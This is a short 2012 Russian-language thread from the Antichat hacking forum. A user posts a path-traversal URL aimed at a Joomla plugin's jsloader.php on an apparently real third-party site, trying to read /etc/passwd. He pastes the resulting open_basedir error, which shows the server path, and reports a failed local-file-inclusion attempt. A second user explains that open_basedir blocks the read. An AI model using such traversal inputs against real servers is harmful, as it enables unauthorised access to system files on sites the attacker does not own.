ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Реальный путь к серверу %s (https://forum.antichat.xyz/showthread.php?t=8051610)

jeckas 09.01.2012 01:00

Всем добрый вечер. Сегодня я просканировал сайт и появилось что то на подобии этого:
http://topfaces.?/plugins/system/cds...ader.php?files[]=../../../../../../../../../etc/passwd&files[]=jquery-noconflict.js нажимаю на ссылку и вот что нахожу



Warning: is_file() [function.is-file]: open_basedir restriction in effect. File(/home/topfaces/public_html/plugins/system/cdscriptegrator/libraries/jquery/js/../../../../../../../../../etc/passwd) is not within the allowed path(s): (/home/topfaces:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp) in /home/topfaces/public_html/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php on line 48

jQuery.noConflict();


Пробовал local ineject ничего не происходит. Скажите для чего нужен этот пусть к серверу?

M@ZAX@KEP 09.01.2012 01:00

Цитата:


Пробовал local ineject ничего не происходит.



Ессесно! Тебе же русским языком написано что open_basedir запрещае. И всё на этом, бреемся)

jeckas 09.01.2012 01:00

извини не заметил, ступил.


Время: 21:24